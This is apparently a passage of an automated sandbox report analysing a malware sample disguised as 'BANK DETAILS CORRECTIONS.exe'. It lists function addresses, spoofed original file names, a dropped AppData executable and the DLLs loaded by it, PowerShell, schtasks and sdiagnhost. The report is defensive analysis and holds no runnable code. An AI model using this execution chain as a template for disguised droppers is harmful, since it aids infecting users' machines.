Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_052F1138 13_2_052F1138
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_052F1148 13_2_052F1148
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_052FCC68 13_2_052FCC68
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_052F13D8 13_2_052F13D8
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_052F2E87 13_2_052F2E87
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_052F2E98 13_2_052F2E98
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_06F876C8 13_2_06F876C8
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_06F850E0 13_2_06F850E0
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_06F8CF28 13_2_06F8CF28
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_06F84CA8 13_2_06F84CA8
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_06F86D18 13_2_06F86D18
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_06F86D0B 13_2_06F86D0B
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_06F8DBE0 13_2_06F8DBE0
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_06F868E0 13_2_06F868E0
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 13_2_052F13E8 13_2_052F13E8
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01510100 20_2_01510100
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01566000 20_2_01566000
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_015A02C0 20_2_015A02C0
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01520535 20_2_01520535
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01544750 20_2_01544750
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01520770 20_2_01520770
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0151C7C0 20_2_0151C7C0
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0153C6E0 20_2_0153C6E0
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01536962 20_2_01536962
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_015229A0 20_2_015229A0
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0152A840 20_2_0152A840
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01522840 20_2_01522840
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0154E8F0 20_2_0154E8F0
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01558890 20_2_01558890
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_015068B8 20_2_015068B8
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0151EA80 20_2_0151EA80
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0152ED7A 20_2_0152ED7A
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0152AD00 20_2_0152AD00
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01528DC0 20_2_01528DC0
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0151ADE0 20_2_0151ADE0
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01538DBF 20_2_01538DBF
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01520C00 20_2_01520C00
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01510CF2 20_2_01510CF2
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01594F40 20_2_01594F40
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01540F30 20_2_01540F30
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01562F28 20_2_01562F28
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01512FC8 20_2_01512FC8
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0159EFA0 20_2_0159EFA0
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01520E59 20_2_01520E59
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01532E90 20_2_01532E90
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0150F172 20_2_0150F172
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0155516C 20_2_0155516C
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0152B1B0 20_2_0152B1B0
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0150D34C 20_2_0150D34C
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_015233F3 20_2_015233F3
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0153B2C0 20_2_0153B2C0
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0153D2F0 20_2_0153D2F0
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_015252A0 20_2_015252A0
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01511460 20_2_01511460
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_015674E0 20_2_015674E0
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01523497 20_2_01523497
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0152B730 20_2_0152B730
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01529950 20_2_01529950
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0153B950 20_2_0153B950
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01525990 20_2_01525990
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0158D800 20_2_0158D800
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_015238E0 20_2_015238E0
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01595BF0 20_2_01595BF0
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0155DBF9 20_2_0155DBF9
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0153FB80 20_2_0153FB80
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01593A6C 20_2_01593A6C
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01523D40 20_2_01523D40
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_0153FDC0 20_2_0153FDC0
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01599C32 20_2_01599C32
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01539C20 20_2_01539C20
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01521F92 20_2_01521F92
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: 20_2_01529EB0 20_2_01529EB0
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: String function: 01567E54 appears 97 times
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Code function: String function: 0158EA12 appears 36 times
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: String function: 01965130 appears 58 times
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: String function: 019AF290 appears 105 times
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: String function: 01977E54 appears 100 times
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: String function: 0199EA12 appears 86 times
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: String function: 0191B970 appears 283 times
Sample file is different than original file name gathered from version info
Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1296298907.0000000004080000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs BANK DETAILS CORRECTIONS.exe
Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1295194192.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWagon.dll> vs BANK DETAILS CORRECTIONS.exe
Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1304078204.0000000007F50000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs BANK DETAILS CORRECTIONS.exe
Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1302494818.0000000005A00000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameWagon.dll> vs BANK DETAILS CORRECTIONS.exe
Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000000.1248838947.00000000009EC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamehBWP.exe@ vs BANK DETAILS CORRECTIONS.exe
Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1303137425.000000000755E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamehBWP.exe@ vs BANK DETAILS CORRECTIONS.exe
Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1294018574.000000000107E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs BANK DETAILS CORRECTIONS.exe
Source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1416407629.00000000013C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesdiagnhost.exej% vs BANK DETAILS CORRECTIONS.exe
Source: BANK DETAILS CORRECTIONS.exe, 0000000C.00000002.1418954641.0000000001A1D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs BANK DETAILS CORRECTIONS.exe
Source: BANK DETAILS CORRECTIONS.exe Binary or memory string: OriginalFilenamehBWP.exe@ vs BANK DETAILS CORRECTIONS.exe
Tries to load missing DLLs
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: netutils.dll
